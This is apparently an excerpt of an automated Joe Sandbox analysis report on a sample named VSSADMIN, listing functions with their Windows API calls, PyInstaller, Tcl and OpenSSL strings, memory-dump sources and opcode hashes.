                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                      • Opcode ID: 2cc5a4cded4ecef5b1ebc9d4bcc7e49c1205c2bdcadbae89e659e8d650b3b6a2
                                                                                                                                                                      • Instruction ID: cb42433b5953b0dda67b1e0089ff244890e0d84ac0495b15073d0d30240f97a8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cc5a4cded4ecef5b1ebc9d4bcc7e49c1205c2bdcadbae89e659e8d650b3b6a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BD1C126E08A4296E7249F25D4D01B967B1FF56FA8F448137EA0DC7A85DF3DE841C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction ID: 0a12bd7df231abbe741c659f4b0952ab2586f86e3b7f15c9633988d0bca6aba2
                                                                                                                                                                      • Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction Fuzzy Hash: 67314136618F8196DB64CB25E8802EE73B4FB85B68F500136EA9D83B95DF3DD545C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                      • Opcode ID: 623d3f57ef72cd0df657952e6d1f3843b180603a65a1e46de5efd301fd58a1b3
                                                                                                                                                                      • Instruction ID: 962ff6a41b4d55d3988710cef1e5ff54d8f6c494a582aed03bfcb54f23ff9a01
                                                                                                                                                                      • Opcode Fuzzy Hash: 623d3f57ef72cd0df657952e6d1f3843b180603a65a1e46de5efd301fd58a1b3
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB1B562B19E9651EA609B26D4806BA63B1EB46FF8F444133EE5D87B85DF3DE441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C950FA
                                                                                                                                                                        • Part of subcall function 00007FF614C94848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9485C
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9510B
                                                                                                                                                                        • Part of subcall function 00007FF614C947E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C947FC
                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF614C9511C
                                                                                                                                                                        • Part of subcall function 00007FF614C94818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C9482C
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                        • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF614C9535C), ref: 00007FF614C95143
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                      • Opcode ID: e2ff6b89c74d0715b8c25be54fefa0a6bdbc36a2ab972a0e38a943a05cc41bbd
                                                                                                                                                                      • Instruction ID: 3467c06d292c2f9e9a3e86a1de5ffc1b2cf8cfba00a850a0ab9599cce632a896
                                                                                                                                                                      • Opcode Fuzzy Hash: e2ff6b89c74d0715b8c25be54fefa0a6bdbc36a2ab972a0e38a943a05cc41bbd
                                                                                                                                                                      • Instruction Fuzzy Hash: B251AD36A08E4296E714DF21E8C15B96770FB5AFA8F408137EA0DC3A96DF3DE4418740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastbind
• String ID: ..\s\crypto\bio\b_sock2.c
• API String ID: 2328862993-3200932406
• Opcode ID: 769c29d007f33f69811d41728ff054719c46503b891464c8ad49b5064c10f0e6
• Instruction ID: c74d6401c82730f6f899e7cb00cb27f34f0968bbe0e7749beef81fbaf2795edc
• Opcode Fuzzy Hash: 769c29d007f33f69811d41728ff054719c46503b891464c8ad49b5064c10f0e6
• Instruction Fuzzy Hash: D421CD72B0821A86E714DB26F8606AD7760FB80B98F400635EB9D43BD9DF3DE9559B00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
• Instruction ID: 16075fe6d6d8b8483d344ba2f931c62f5eb61ece27789cd7de5e838f743fb341
• Opcode Fuzzy Hash: a46b17bfff405d911cbf0ed16f10332b4be66aad2a683c4b6cb6413eca26ac33
• Instruction Fuzzy Hash: E4F0BE323682A505CB99CA36B448FAD6ED59391BC9F22C030EA0CC3F55E92EC601CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
• Instruction ID: eeaf4836678b8b6a304919c63ceb6be758e64cbe88196c4ace8b54458b72a233
• Opcode Fuzzy Hash: 47cb47f2231c500fe69675262d211844ffd3893697c7c00b0061ec7b87a542e7
• Instruction Fuzzy Hash: 40E0DF727583A845C75ACA333118E6DAB90A754B89F43C030DA0EC3F46EC2EC601DB40
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
• API String ID: 190572456-3109299426
• Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
• Instruction ID: 820fcf5087af11d6701d077da3f7f76edcc49149595e5afffe47fb918676a7f8
• Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
• Instruction Fuzzy Hash: 46423564A0EF47B2EE558B08E9D117422B2BF46FB9B946037C40E87364FF7EA559C200
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                      • API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction ID: cc77478cef4e4865c127855ced30ecffb89254863447c57f9a8509bea91ed954
                                                                                                                                                                      • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                      • Instruction Fuzzy Hash: E4E18564A0DF43A2FE558B18F9D017423B5AF17FB9BC46037C84E87664EF7EA5588201
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
• API String ID: 3568877910-3630080479
• Opcode ID: cb09d76981884f911073ec79770a94529b3f76ec59753b3682a11d1b1a51dff2
• Instruction ID: b06032287b734661b633492b38e9e5e878e76ad82238964c7e181ceaa8d257ae
• Opcode Fuzzy Hash: cb09d76981884f911073ec79770a94529b3f76ec59753b3682a11d1b1a51dff2
• Instruction Fuzzy Hash: 0BC19BA2B4C74A81EE68EB21A4A06BD6391AF81784F449036DF0D07786EF3DF545FB41
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
• String ID: $OpenSSL$OpenSSL: FATAL$no stack?
• API String ID: 1270133462-2963566556
• Opcode ID: 75131406242315063b9eb8b61f751d263e868ede2efdb133bf2f38d68100ef13
• Instruction ID: fb691c9021c1b0dfbaeb33edde8e1710eb004080f9c02d8589ba263c4f07db13
• Opcode Fuzzy Hash: 75131406242315063b9eb8b61f751d263e868ede2efdb133bf2f38d68100ef13
• Instruction Fuzzy Hash: 1691CF73B08B8A86EB248F24E8A45AD7760FB45B94F404736EB5D07A95EF3CE255D300
Uniqueness
• Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID:
• String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 0-666925554
• Opcode ID: 41c0502262cf3944fd249ac30d9296d3fd4dc7e2994cda9a83d5d30045412d46
• Instruction ID: 002627bfc82ce9889b8d8cd2fb871a574f5cee74e2ef7071d5e6b6c9794b3c83
• Opcode Fuzzy Hash: 41c0502262cf3944fd249ac30d9296d3fd4dc7e2994cda9a83d5d30045412d46
• Instruction Fuzzy Hash: FC51AC61B0CE8292EA109B15E4D56B963B2AF86FF9F444133DE0D87796EE3EE5458300
Uniqueness
• Uniqueness Score: -1.00%
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00007FF614C7687A,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77910
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77921
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77943
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7794D
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7798A
                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF614C7799C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779B4
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779E6
                                                                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF614C77A0D
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77A1E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
• String ID: D:(A;;FA;;;%s)$S-1-3-4
• API String ID: 4998090-2855260032
• Opcode ID: 76bb3550803a78cfa8e176607768f7e16a77bb2e97f93ab652bde795ceb62436
• Instruction ID: d6865ce8e8da8e6b9fc4ba81797bd2e0a7ba25aab07dd6370f01fbdfa9e29f00
• Opcode Fuzzy Hash: 76bb3550803a78cfa8e176607768f7e16a77bb2e97f93ab652bde795ceb62436
• Instruction Fuzzy Hash: CF41AF3161DE8692EB109F64E4846AA7371FB86BB5F401232EA9E876D5DF3DE404C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
• API String ID: 3568877910-1596076588
• Opcode ID: 7fedaee5a43b9f96133ba3337b9998908fec395ca8a45f4228c1692c16d9240c
• Instruction ID: 1bfa46f2e54ce71a7e4e031d5e60bc146e057128f2cf9cafb53a837b057d3d39
• Opcode Fuzzy Hash: 7fedaee5a43b9f96133ba3337b9998908fec395ca8a45f4228c1692c16d9240c
• Instruction Fuzzy Hash: 1851C1A2B1C70F96EA0DAB22A4346B93390BF94B84F440532EF4E07791DE3CE405E790
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
• Instruction ID: 6a098fbf13fc729f86e8d03fb4107a33b8e2e945738758404f7dd677c4b02f99
